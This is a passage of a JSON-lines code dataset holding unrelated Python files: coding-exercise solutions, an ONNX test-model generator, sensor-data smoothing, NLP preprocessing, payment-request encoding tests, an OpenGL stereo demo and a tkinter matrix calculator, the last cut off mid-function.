S.\n\n# Constraints 0 < len(S) < 1000\n\n# Output Format\n# In the first line, print True if S has any alphanumeric characters. Otherwise, print False.\n# In the second line, print True if S has any alphabetical characters. Otherwise, print False.\n# In the third line, print True if S has any digits. Otherwise, print False.\n# In the fourth line, print True if S has any lowercase characters. Otherwise, print False.\n# In the fifth line, print True if S has any uppercase characters. Otherwise, print False. \n\nif __name__ == '__main__':\n s = input()\n alnum = False\n alpha = False\n digit = False\n lower = False\n upper = False\n for i in range(len(s)):\n if s[i].isalnum() and not alnum:\n alnum = True\n if s[i].isalpha() and not alpha:\n alpha = True\n if s[i].isdigit() and not digit:\n digit = True\n if s[i].islower() and not lower:\n lower = True\n if s[i].isupper() and not upper:\n upper = True\n print(alnum)\n print(alpha)\n print(digit)\n print(lower)\n print(upper)","repo_name":"mghadieh/python","sub_path":"HackerRank/11_StringValidators.py","file_name":"11_StringValidators.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21103478154","text":"import os\n\nimport numpy as np\nimport onnx\nfrom onnx import TensorProto, helper\nfrom onnx.external_data_helper import set_external_data\nfrom onnx.numpy_helper import from_array\n\n\ndef create_external_data_tensor(value, tensor_name): # type: (List[Any], Text) -> TensorProto\n tensor = from_array(np.array(value))\n tensor.name = tensor_name\n tensor_filename = f\"{tensor_name}.bin\"\n set_external_data(tensor, location=tensor_filename)\n\n with open(os.path.join(tensor_filename), \"wb\") as data_file:\n data_file.write(tensor.raw_data)\n tensor.ClearField(\"raw_data\")\n tensor.data_location = onnx.TensorProto.EXTERNAL\n return tensor\n\n\ndef GenerateModel(model_name, external_data_name): # noqa: N802\n # Create one input (ValueInfoProto)\n X = helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, [1, 2]) # noqa: N806\n\n # Create second input (ValueInfoProto)\n Pads = helper.make_tensor_value_info(external_data_name, TensorProto.INT64, [4]) # noqa: N806\n\n # Create one output (ValueInfoProto)\n Y = helper.make_tensor_value_info(\"Y\", TensorProto.FLOAT, [1, 4]) # noqa: N806\n\n # Create a node (NodeProto)\n node_def = helper.make_node(\n \"Pad\", # node name\n [\"X\", external_data_name], # inputs\n [\"Y\"], # outputs\n mode=\"constant\", # Attributes\n )\n\n # Create the graph (GraphProto)\n graph_def = helper.make_graph(\n [node_def],\n \"test-model\",\n [X, Pads],\n [Y],\n [\n create_external_data_tensor(\n [\n 0,\n 0,\n 1,\n 1,\n ],\n external_data_name,\n )\n ],\n )\n\n # Create the model (ModelProto)\n model_def = helper.make_model(graph_def, producer_name=\"onnx-example\")\n\n print(f\"The ir_version in model: {model_def.ir_version}\\n\")\n print(f\"The producer_name in model: {model_def.producer_name}\\n\")\n print(f\"The graph in model:\\n{model_def.graph}\")\n onnx.checker.check_model(model_def)\n print(\"The model is checked!\")\n with open(model_name, \"wb\") as model_file:\n model_file.write(model_def.SerializeToString())\n\n\nif __name__ == \"__main__\":\n GenerateModel(\"model_with_external_initializers.onnx\", \"Pads\")\n GenerateModel(\"model_with_orig_ext_data.onnx\", \"model_with_orig_ext_data\")\n","repo_name":"microsoft/onnxruntime","sub_path":"onnxruntime/test/testdata/model_with_external_initializers.py","file_name":"model_with_external_initializers.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":9700,"dataset":"github-code","pt":"18"} +{"seq_id":"35707114242","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 18 10:41:35 2018\n\n对正规化后的传感器监测数据平滑\n\n@author: maliang\n\"\"\"\nimport os\n\nimport pandas as pd\nimport numpy as np\nimport statsmodels.api as sm\nfrom matplotlib import pyplot as plt\n\ndef smooth(seq, frac):\n lowess = sm.nonparametric.lowess\n x = list(range(len(seq)))\n seq_smoothed = lowess(seq, x, frac=frac, return_sorted=False)\n return seq_smoothed\n\nengine_list = [str(i + 1) for i in range(218)] # All engines\nsensor_list = ['s2', 's3', 's4', 's7', 's8', 's9', 's11', 's12',\n 's13', 's14', 's15', 's17', 's20', 's21'] # All sensitive sensors\n\n\n# creative folders to save smooth figures\nfigure_path = 'figures/smooth/'\nfor sensor_name in sensor_list:\n if not os.path.exists(figure_path+sensor_name+'/'):\n os.mkdir(figure_path+sensor_name+'/')\n \n \ndata_path = 'data_with_engine_ID/'\nfor engine_ID in engine_list:\n df_original = pd.read_csv(data_path+engine_ID+'_transformed.csv', index_col=0)\n df_smooth = pd.DataFrame()\n for icol in range (df_original.shape[1]):\n col_name = df_original.columns[icol]\n if col_name in sensor_list:\n # smooth, save\n seq_raw = np.array(df_original[col_name])\n seq_smoothed = smooth(seq_raw, frac=0.05)\n \n # plot to observe, could be commented\n plt.plot(seq_raw, label='original')\n plt.plot(seq_smoothed, label='smooth')\n plt.legend()\n plt.title('Engine #'+engine_ID+', '+col_name)\n plt.savefig(figure_path+col_name+'/'+engine_ID+'.jpg', dpi=200)\n plt.clf()\n plt.close()\n \n # add to df_smooth\n df_smooth[col_name] = seq_smoothed\n else:\n # directly save\n df_smooth[col_name] = df_original[col_name]\n df_smooth.to_csv(data_path+engine_ID+'_smooth.csv')\n \n \n \n \n \n\n\n\n\n","repo_name":"mal96/PHM","sub_path":"Bachelor-Thesis/LSTM_RUL_estimation_PHM08/2_smooth.py","file_name":"2_smooth.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"18275489128","text":"import csv\nfrom itertools import chain\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\n\"\"\"\nTASK 4:\nThe telephone company want to identify numbers that might be doing\ntelephone marketing. Create a set of possible telemarketers:\nthese are numbers that make outgoing calls but never send texts,\nreceive texts or receive incoming calls.\n\nPrint a message:\n\"These numbers could be telemarketers: \"\n\nThe list of numbers should be print out one per line in lexicographic order with no duplicates.\n\"\"\"\n\ntelephone_numbers_in_texts = list(chain.from_iterable(\n [(sender, reciever) for sender, reciever, _ in texts]))\n\ntexters = set(telephone_numbers_in_texts)\n\ncallers = set()\ncall_recievers = set()\n\nfor caller, reciever, _, _ in calls:\n callers.add(caller)\n call_recievers.add(reciever)\n\n# telemarkerters don't text or revicieve callers\npossible_telemarkerters = callers - (texters | call_recievers)\n\nprint(\"These numbers could be telemarketers:\")\n\nfor tel_number in sorted(possible_telemarkerters):\n print(tel_number)\n","repo_name":"thepembeweb/unscramble-computer-science-problems","sub_path":"Task4.py","file_name":"Task4.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"37301649234","text":"from collections import Counter\n\ndef gcd(a, b):\n while b:\n a, b = b, a % b\n return a\n\ndef slope(a, b):\n mul = gcd(abs(a), abs(b))\n if mul != 0:\n a, b = a // mul, b // mul\n if b < 0:\n a *= -1\n b *= -1\n return (a, b)\n\nn = int(input())\n\narr = list(map(int, input().split()))\n\nvalid = set()\n\nfor i in range(1, n + 1):\n valid.add(i * (i - 1) // 2)\n\npos = False\n\nfor i in range(1, n):\n m = slope(arr[i] - arr[0], i)\n diffs = set()\n diffslope = -1\n for j in range(1, n):\n curr = slope(arr[j] - arr[0], j)\n if curr != m:\n diffslope = j\n break\n if diffslope != -1:\n for j in range(1, n):\n if j == diffslope:\n continue\n curr = slope(arr[j] - arr[0], j)\n if curr != m:\n diffs.add(slope(arr[j] - arr[diffslope], j - diffslope))\n else:\n break\n if len(diffs) == 0 or (len(diffs) == 1 and m in diffs):\n pos = True\n break\n\nslopes = set()\n\nfor i in range(2, n):\n slopes.add(slope(arr[i] - arr[1], i - 1))\n\nif slope(arr[1] - arr[0], 1) in slopes:\n slopes.remove(slope(arr[1] - arr[0], 1))\n\nif len(slopes) == 1:\n pos = True\n\nprint(\"Yes\" if pos else \"No\")","repo_name":"theabbie/leetcode","sub_path":"miscellaneous/B_Tell_Your_World.py","file_name":"B_Tell_Your_World.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"74806373481","text":"import os\n\nimport numpy as np\nimport pickle as pckl\n\nfrom nltk.corpus import wordnet\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import PorterStemmer, WordNetLemmatizer\n\nporter = PorterStemmer()\nwnl = WordNetLemmatizer()\n\ndef process_line(sentence, tokenizer=word_tokenize):\n lemmas = []\n\n for idx, word in enumerate(tokenizer(sentence)):\n lemmas.append(lemmatize(word.lower()))\n\n lemmas = [lemma for lemma in lemmas if lemma.isalpha()]\n return lemmas\n\ndef lemmatize(word, lemmatizer=wnl, stemmer=porter):\n lemma = lemmatizer.lemmatize(word)\n stem = stemmer.stem(word)\n\n if not wordnet.synsets(lemma):\n if not wordnet.synsets(stem):\n return word\n else:\n return stem\n else:\n return lemma\n\ndef generate_vocab(filenames, write_filename='./data/embeddings/vocab.txt'):\n vocabulary = []\n for filename in filenames:\n with open(filename) as data_file:\n lines = [line.split('\\t') for line in data_file.read().splitlines()]\n \n for line in lines:\n words = process_line(line[1])\n vocabulary += [word for word in words if word not in vocabulary]\n \n vocabulary.sort()\n\n with open(write_filename, 'w') as write_file:\n for word in vocabulary:\n write_file.write(\"%s\\n\" % word)\n return\n\ndef map_to_vocab(sentence, vocab_dict='./data/dumps/vocab.pckl'):\n with open(vocab_dict, 'rb') as vfile:\n v_dict = pckl.load(vfile)\n \n return [v_dict.get(word, 0) for word in sentence]\n\ndef zero_pad(sequence, max_len=600):\n # sequence length is approx. equal to\n # the max length of sequence in train set \n return np.pad(sequence, (0, max_len - len(sequence)), mode='constant') \\\n if len(sequence) < max_len else np.array(sequence[:max_len])\n\nclass Process(object):\n def __init__(self, line):\n self.tokens = process_line(line[1])\n \n self.target = np.zeros(len(self.tokens))\n target_words = process_line(line[4])\n for idx,_ in enumerate(self.tokens):\n if self.tokens[idx] in target_words:\n self.target[idx] = 1\n\n self.tokens = zero_pad(map_to_vocab(self.tokens))\n self.target = zero_pad(map_to_vocab(self.target))\n \n self.label = [float(line[9]), float(line[10])]\n\n\nclass DataLoader(object):\n def __init__(self):\n self.data = [] \n\n def load(self, filename):\n with open(filename) as data_file:\n lines = [line.split('\\t') for line in data_file.read().splitlines()]\n \n for line in lines:\n self.data.append(Process(line))\n \n _x = np.array([data.tokens for data in self.data])\n _x_map = np.array([data.target for data in self.data])\n \n _y = np.array([data.label[0] for data in self.data])\n _y_prob = np.array([data.label[1] for data in self.data])\n \n return _x, _x_map, _y, _y_prob\n\ndef fetch(filename):\n \"\"\"\n Fetch the preprocessed data from dump\n \"\"\"\n x, x_map, y, y_prob = pckl.load(open(filename, mode=\"rb\"))\n return x, x_map, y, y_prob\n\n\ndef create_dump(filename, write_filename):\n loader = DataLoader()\n x, x_map, y, y_prob = loader.load(filename)\n pckl.dump((x, x_map, y, y_prob), open(write_filename, \"wb\"))\n return\n\ndef load_embeddings(path, size, dimensions):\n \n embedding_matrix = np.zeros((size, dimensions), dtype=np.float32)\n\n size = os.stat(path).st_size\n with open(path, 'rb') as ifile:\n pos = 0\n idx = 0\n while pos < size:\n chunk = np.load(ifile)\n chunk_size = chunk.shape[0]\n embedding_matrix[idx:idx + chunk_size, :] = chunk\n idx += chunk_size\n pos = ifile.tell()\n return embedding_matrix\n\ndef batch_iter(data, batch_size, n_epochs, shuffle=False):\n print (\"Generating batch iterator ...\")\n data = np.array(data)\n data_size = len(data)\n n_batches_per_epoch = int((data_size - 1) / batch_size) + 1\n \n for epoch in range(n_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n \n for batch_num in range(n_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield shuffled_data[start_index:end_index]","repo_name":"aayux/quinn","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"72107525219","text":"\"\"\"\nTests for encoding Express Checkout API objects to NVP.\n\"\"\"\nimport decimal\n\nfrom twisted.trial import unittest\n\nfrom txievery.expresscheckout import api\nfrom txievery.expresscheckout.encode import encodePaymentRequests, _encodeItem\n\n\nCHEAP_ITEM = api.Item(\"Cake\", \"100.00\")\nEXPENSIVE_ITEM = api.Item(\"Diamond\", \"100000.00\")\n\n\ndef categories(itemDetails):\n return [item.category for item, qty in itemDetails]\n\n\n\nclass RequestEncodingTest(unittest.TestCase):\n items = [CHEAP_ITEM, EXPENSIVE_ITEM]\n\n def setUp(self):\n itemDetails = [(self.items[0], 1)]\n self.singleItemRequest = api.PaymentRequest(itemDetails)\n self.singleItemRequest.categories = categories(itemDetails)\n\n itemDetails = [(self.items[0], 2), (self.items[1], 3)]\n self.multipleItemRequest = api.PaymentRequest(itemDetails)\n self.multipleItemRequest.categories = categories(itemDetails)\n\n\n def test_oneItem(self):\n \"\"\"\n Tests a single payment request with a single item.\n \"\"\"\n request = self.singleItemRequest\n encoded = encodePaymentRequests(request)\n categories = request.categories\n expected = [('PAYMENTREQUEST_0_PAYMENTACTION', 'Sale'),\n ('PAYMENTREQUEST_0_AMT', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_QTY0', 1),\n ('L_PAYMENTREQUEST_0_AMT0', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY0', categories[0]),\n ('L_PAYMENTREQUEST_0_NAME0', 'Cake')]\n self.assertEqual(list(encoded), expected)\n\n\n def test_manyItems(self):\n \"\"\"\n Tests a single payment request with more than one item.\n \"\"\"\n request = self.multipleItemRequest\n encoded = encodePaymentRequests(request)\n categories = request.categories\n expected = [('PAYMENTREQUEST_0_PAYMENTACTION', 'Sale'),\n ('PAYMENTREQUEST_0_AMT', decimal.Decimal('300200.00')),\n ('L_PAYMENTREQUEST_0_QTY0', 2),\n ('L_PAYMENTREQUEST_0_AMT0', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY0', categories[0]),\n ('L_PAYMENTREQUEST_0_NAME0', 'Cake'),\n ('L_PAYMENTREQUEST_0_QTY1', 3),\n ('L_PAYMENTREQUEST_0_AMT1', decimal.Decimal('100000.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY1', categories[1]),\n ('L_PAYMENTREQUEST_0_NAME1', 'Diamond'),]\n self.assertEqual(list(encoded), expected)\n\n\n def test_several(self):\n \"\"\"\n Test several payment requests with variable amounts of items.\n \"\"\"\n requests = self.singleItemRequest, self.multipleItemRequest\n encoded = encodePaymentRequests(*requests)\n categories = [r.categories for r in requests]\n expected = [('PAYMENTREQUEST_0_PAYMENTACTION', 'Sale'),\n ('PAYMENTREQUEST_0_AMT', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_QTY0', 1),\n ('L_PAYMENTREQUEST_0_AMT0', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY0', categories[0][0]),\n ('L_PAYMENTREQUEST_0_NAME0', 'Cake'),\n ('PAYMENTREQUEST_1_PAYMENTACTION', 'Sale'),\n ('PAYMENTREQUEST_1_AMT', decimal.Decimal('300200.00')),\n ('L_PAYMENTREQUEST_1_QTY0', 2),\n ('L_PAYMENTREQUEST_1_AMT0', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_1_ITEMCATEGORY0', categories[1][0]),\n ('L_PAYMENTREQUEST_1_NAME0', 'Cake'),\n ('L_PAYMENTREQUEST_1_QTY1', 3),\n ('L_PAYMENTREQUEST_1_AMT1', decimal.Decimal('100000.00')),\n ('L_PAYMENTREQUEST_1_ITEMCATEGORY1', categories[1][1]),\n ('L_PAYMENTREQUEST_1_NAME1', 'Diamond')]\n self.assertEqual(list(encoded), expected)\n\n\n \nclass ItemEncodingTest(unittest.TestCase):\n items = [CHEAP_ITEM, EXPENSIVE_ITEM]\n\n def _testEncode(self, index, item, qty, expected):\n encoded = _encodeItem(\"PAYMENTREQUEST_0_{0}\", index, item, qty)\n self.assertEqual(list(encoded), expected)\n\n \n def test_one(self):\n \"\"\"\n Tests encoding a single item.\n \"\"\"\n expectedCategory = self.items[0].category\n expected = [('L_PAYMENTREQUEST_0_QTY0', 1),\n ('L_PAYMENTREQUEST_0_AMT0', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY0', expectedCategory),\n ('L_PAYMENTREQUEST_0_NAME0', 'Cake')]\n self._testEncode(0, self.items[0], 1, expected)\n\n\n def test_many(self):\n \"\"\"\n Tests encoding a single item with a quantity larger than 1.\n \"\"\"\n expectedCategory = self.items[0].category\n expected = [('L_PAYMENTREQUEST_0_QTY0', 10),\n ('L_PAYMENTREQUEST_0_AMT0', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY0', expectedCategory),\n ('L_PAYMENTREQUEST_0_NAME0', 'Cake')]\n self._testEncode(0, self.items[0], 10, expected)","repo_name":"lvh/txievery","sub_path":"txievery/expresscheckout/test/test_encode.py","file_name":"test_encode.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"29553341434","text":"from wxpy3d import Window\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom rtmodel import mesh\nfrom rtmodel import camera\nfrom wxpy3d.opengl_state import opengl_state\n\nif not 'window' in globals():\n #window = CameraWindow(size=(1920,1080))\n window = Window(size=(1024,768))\n glutInit()\n window.ShowFullScreen(True)\n\n\ndef load_obj(name='gamecube'):\n global obj\n\n window.canvas.SetCurrent()\n obj = mesh.load(name)\n obj.RT = np.eye(4, dtype='f')\n obj.RT[:3,3] = -obj.vertices[:,:3].mean(0)\n\n window.lookat = obj.RT[:3,3] + obj.vertices[:,:3].mean(0)\n window.Refresh()\n\n\n@window.eventx\ndef EVT_CHAR(evt):\n key = evt.GetKeyCode()\n if key == ord('f'):\n window.ShowFullScreen(not window.IsFullScreen())\n if key == ord(' '):\n pass\n\n\n# Animation\nif not 'is_animating' in globals():\n is_animating = False\n\ndef resume():\n global is_animating\n is_animating = True\n\ndef stop():\n global is_animating\n is_animating = False\n\nanim_angle = 0.0\n@window.eventx\ndef EVT_IDLE(evt):\n global anim_angle\n if is_animating:\n anim_angle += 0.005\n window.Refresh()\n\n# Render the mesh before drawing points\n@window.event\ndef on_draw():\n\n camera = None\n\n class NoDraw: draw = lambda _: None\n\n def render(mode):\n glDrawBuffer(dict(left=GL_BACK_LEFT,\n right=GL_BACK_RIGHT,\n center=GL_BACK)[mode])\n\n glClearColor(0,0,0,0)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n proj_matrix, model_matrix = make_projection(camera, mode)\n glMatrixMode(GL_PROJECTION)\n glLoadMatrixf(proj_matrix.transpose())\n glMatrixMode(GL_MODELVIEW)\n glLoadMatrixf(model_matrix.transpose())\n\n with opengl_state(): \n draw_thing()\n \n if 1 and glGetInteger(GL_STEREO):\n render('left')\n render('right')\n else:\n render('center')\n\n\ndef draw_thing():\n\n global obj\n if not 'obj' in globals():\n load_obj()\n window.canvas.SetCurrent()\n window.Refresh()\n\n glLightfv(GL_LIGHT0, GL_POSITION, (-40, 200, 100, 0.0))\n glLightfv(GL_LIGHT0, GL_AMBIENT, (0.3, 0.3, 0.3, 0.0))\n glLightfv(GL_LIGHT0, GL_DIFFUSE, (0.3, 0.3, 0.3, 0.0))\n glEnable(GL_LIGHT0)\n glEnable(GL_LIGHTING)\n #glColorMaterial(GL_FRONT_AND_BACK, GL_AMBIENT_AND_DIFFUSE)\n glEnable(GL_COLOR_MATERIAL)\n glEnable(GL_DEPTH_TEST)\n glShadeModel(GL_SMOOTH)\n\n # glRotate for pitch down and rotation\n glRotate(-20*1, 1,0,0)\n glRotate(np.rad2deg(anim_angle), 0,1,0)\n glScale(-0.33,0.33,0.33)\n obj.draw()\n\n\ndef make_projection(camera, mode):\n assert mode in ('left','right','center')\n\n # Copy the matrix projection mode given camera parameters\n eyesep = 0.063 # Average adult eyes are 60mm apart\n width = 0.736 # Width of the projection image (m)\n focal_length = 1.5 # Distance to the projection image (m)\n ratio = 1920 / 1080. # Width / height\n #ratio = 1024 / 768. # Width / height\n\n far = 10\n near = 0.5 # Near plane is half meter in front of eyes\n tan_ap = 0.5 * width / focal_length\n wd2 = near * tan_ap\n ndfl = near / focal_length\n\n offsetx = dict(left=-1,right=1,center=0)[mode] * 0.5 * eyesep\n\n left = - ratio * wd2 + offsetx * ndfl\n right = ratio * wd2 + offsetx * ndfl\n top = wd2\n bottom = - wd2\n\n with opengl_state():\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glFrustum(left, right, bottom, top, near, far)\n projection = glGetFloatv(GL_PROJECTION_MATRIX).transpose()\n\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n glTranslate(offsetx,0,-focal_length)\n glRotate(180, 0,1,0)\n modelview = glGetFloatv(GL_MODELVIEW_MATRIX).transpose()\n\n return projection, modelview\n\n\nwindow.Refresh()\n","repo_name":"amiller/projective_stereo","sub_path":"demos/demo_objrender.py","file_name":"demo_objrender.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"72261150176","text":"from turtle import *\nfrom time import sleep\n\ndef draw_star(sides: int):\n alpha = 180/sides\n\n color('green', 'purple')\n begin_fill()\n sleep(3)\n\n for i in range(0, sides):\n forward(200)\n right(180 - alpha)\n end_fill()\n done()\n\nif __name__ == \"__main__\":\n draw_star(9)","repo_name":"hlfshell/rbe550","sub_path":"hw0/turtle-sim.py","file_name":"turtle-sim.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40002105778","text":"##programa hecho por Abdul Hamid Achik López\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom sympy import *\nimport DAO\nimport models\n\nmatrices = list()\ndiccionario = dict()\nroot = Tk()\nf = ttk.Frame(root, height=600, width=830)\nf.pack()\nroot.title(\"Pytrix\")\nroot.option_add('+tearOff', False)\nmenubar = Menu(f)\nroot.config(menu=menubar)\nfile = Menu(menubar)\nedit = Menu(menubar)\nhelp_ = Menu(menubar)\nmenubar.add_cascade(menu=file, label='Archivo')\nmenubar.add_cascade(menu=edit, label='Editar')\nmenubar.add_cascade(menu=help_, label='Ayuda')\nhelp_.add_command(label='Informacion', command=lambda: about())\nfile.add_command(label='Guardar',command = lambda:guardarFile(t.get(\"1.0\",END)))\ngBotones = ttk.LabelFrame(f, text=\"Menu \")\ngBotones.place(x=695, y=20)\ngText = ttk.LabelFrame(f, text=\"Texto\")\ngText.place(x=20, y=20)\ngLista = ttk.LabelFrame(f, text=\"Matrices Creadas\")\ngLista.place(x=695, y=230)\ngMenu = ttk.LabelFrame(f, text=\"Operaciones\")\ngMenu.place(x=695, y=310)\ntScrl = ttk.Scrollbar(gText)\ntScrl.grid(row=0,column=1,sticky='ns')\nt = Text(gText, height=33, width=78,yscrollcommand=tScrl.set)\nt.grid(row=0, column=0)\ntScrl.config(command=t.yview)\nbMult = ttk.Button(gMenu, text=\"x\", width=15, command=lambda: Multiplicacion(lstMatrices.get(lstMatrices.curselection())))\nbMult.pack(padx=5, pady=5)\nbSum = ttk.Button(gMenu, text=\"+\", width=15, command=lambda: Suma(lstMatrices.get(lstMatrices.curselection())))\nbSum.pack(padx=5, pady=5)\nbRes = ttk.Button(gMenu, text=\"-\", width=15, command=lambda: Resta(lstMatrices.get(lstMatrices.curselection())))\nbRes.pack(padx=5, pady=5)\nbInv = ttk.Button(gMenu, text=\"Inversa\", width=15, command=lambda: Inversa(lstMatrices.get(lstMatrices.curselection())))\nbInv.pack(padx=5, pady=5)\nbConst = ttk.Button(gMenu, text=\"x*A\",width=15, command=lambda: MultVar(lstMatrices.get(lstMatrices.curselection())))\nbConst.pack(padx=5, pady=5)\nbPot = ttk.Button(gMenu,text=\"A^x\",width=15)\nbPot.pack(padx=5, pady=5)\nbEuler = ttk.Button(gMenu, text=\"e^A\", width=15)\nbEuler.pack(padx=5, pady=5)\nbInit = ttk.Button(gBotones, text =\"Crear Matriz\", width=15, command=lambda: init())\nbInit.pack(padx=5, pady=5)\nbGauss = ttk.Button(gBotones, text=\"Gauss\", width=15, command=lambda: \\\n gauss(lstMatrices.get(lstMatrices.curselection())))\nbGauss.pack(padx=5, pady=5)\nbDeter = ttk.Button(gBotones, text=\"Determinante\", width=15, command=lambda: \\\n determinante(lstMatrices.get(lstMatrices.curselection())))\nbDeter.pack(padx=5, pady=5)\nbEigVals = ttk.Button(gBotones, text=\"Eigenvalores\",width=15, command=lambda: \\\n eigVal(lstMatrices.get(lstMatrices.curselection())))\nbEigVals.pack(padx=5, pady=5)\nbEigVects = ttk.Button(gBotones, text=\"Eigenvectores\",width=15, command=lambda: \\\n eigVect(lstMatrices.get(lstMatrices.curselection())))\nbEigVects.pack(padx=5, pady=5)\nscrlMatrices = ttk.Scrollbar(gLista)\nlstMatrices = Listbox(gLista, yscrollcommand=scrlMatrices, exportselection=0)\nlstMatrices.config(height=3, width=13)\nlstMatrices.grid(row=0, column=0)\nscrlMatrices.grid(row=0, column=1)\nscrlMatrices.config(command=lstMatrices.yview)\n\n\ndef init():\n fn = Toplevel()\n lbColumna = Label(fn, text=\"Columnas\", font=('Arial', 9))\n lbColumna.grid(row=0, column=0, padx=5, pady=10)\n lbFila = Label(fn, text=\"Filas\", font=('Arial', 9))\n lbFila.grid(row=0, column=1, padx=5, pady=10)\n entColumna = Entry(fn, textvariable=1, width=10)\n entColumna.grid(row=1, column=0, padx=5, pady=10)\n entFila = Entry(fn, textvariable=2, width=10)\n entFila.grid(row=1, column=1, padx=5, pady=10)\n\n btnCrear = Button(fn, text=\"Crear\", width=10, command=lambda: crearMatriz(int(Entry.get(entFila)),\n int(Entry.get(entColumna))))\n btnCrear.grid(row=2, column=1)\n\n def crearMatriz(fila, columna):\n entFila.delete(0, END)\n entColumna.delete(0, END)\n fn.destroy()\n fx = Toplevel()\n Svar = list()\n cmpLb = LabelFrame(fx, text=\"Matriz\")\n cmpLb.pack()\n cmpBt = LabelFrame(fx, text=\"Nombre de la matriz\")\n cmpBt.pack()\n\n for i in range(0, fila):\n b = list()\n \n for j in range(0, columna):\n b.insert(j, StringVar())\n entDt = Entry(cmpLb, textvariable=b[j], width=5)\n entDt.grid(row=i, column=j)\n\n Svar.insert(j, b)\n entNombre = Entry(cmpBt, textvariable=4, width=10)\n entNombre.grid(row=0, column=0)\n btn = Button(cmpBt, text=\"Aceptar\", command=lambda: Aceptar(Svar, Entry.get(entNombre)))\n btn.grid(row=0, column=1)\n\n def Aceptar(Svar, Nombre):\n entNombre.delete(0, END)\n for i in range(0, fila):\n\n for j in range(0, columna):\n \n Svar[i][j] = Svar[i][j].get()\n \n matrices.append(Svar)\n \n lstMatrices.insert(END, Nombre)\n diccionario[Nombre] = matrices[-1]\n \n fx.destroy()\n \n t.insert(END, \"Matriz creada exitosamente!\\n\\n\")\n\n\ndef mostrar(Matriz, Nombre):\n \n try:\n t.insert(END, (Nombre + \" = \\n\"))\n for i in range(0, len(Matriz)):\n t.insert(END, \"\\t\")\n t.insert(END, Matriz[i])\n t.insert(END, \"\\n\")\n except TypeError:\n t.insert(END, (Nombre + \"=\"))\n t.insert(END, \"\\t\")\n t.insert(END, Matriz)\n t.insert(END, \"\\n\")\n \n\ndef onSelect(evt):\n \n if lstMatrices.size() == 0:\n try:\n t.insert(END, \"no hay nada en la lista seleccionado\\n\")\n except Exception:\n t.insert(END, \"hubo un Error \\n\")\n pass\n else:\n fn = Toplevel()\n lb = Label(fn, text=\"Mostrar matriz en pantalla\")\n lb.pack(padx=5, pady=5)\n btnSi = Button(fn, text=\"Si\", command=lambda: si())\n btnSi.pack(side=LEFT, padx=5, pady=5)\n btnNo = Button(fn, text=\"No\", command=lambda: no())\n btnNo.pack(side=RIGHT, padx=5, pady=5)\n\n def no():\n fn.destroy()\n fx = Toplevel()\n string = \"Matriz \" + lstMatrices.get(lstMatrices.curselection()) + \" seleccionada\"\n lb = Label(fx, text=string)\n lb.pack(padx=5, pady=5)\n btn = Button(fx, text=\"Ok\", command=lambda: fx.destroy())\n btn.pack(padx=5, pady=5)\n lstMatrices.get(lstMatrices.curselection())\n\n def si():\n mostrar(diccionario[lstMatrices.get(lstMatrices.curselection())],\n lstMatrices.get(lstMatrices.curselection()))\n fn.destroy()\n\nlstMatrices.bind('<>', onSelect)\n\n\ndef gauss(Nombre):\n fila = len(diccionario[Nombre])\n columna = len(diccionario[Nombre][0])\n if (fila + 1) == columna:\n \n t.insert(END, \"\\n\")\n m = Matrix(diccionario[Nombre])\n res = m.rref()\n t.insert(END, \"Resultado = \\n\")\n c = trans(res[0])\n nuevoNombre = \"ans(\" + Nombre + \")\"\n mostrar(c, Nombre)\n guardar(c, nuevoNombre)\n\n else:\n t.insert(END, \"La matriz fue resuelta pero no tiene un resultado util \\n\")\n\n\ndef determinante(Nombre):\n if len(diccionario[Nombre]) == len(diccionario[Nombre][0]):\n t.insert(END, \"\\n\")\n m = Matrix(diccionario[Nombre])\n res = m.det()\n nuevoNombre = \"det(\" + Nombre + \")\"\n guardar(res, nuevoNombre)\n \n t.insert(END, 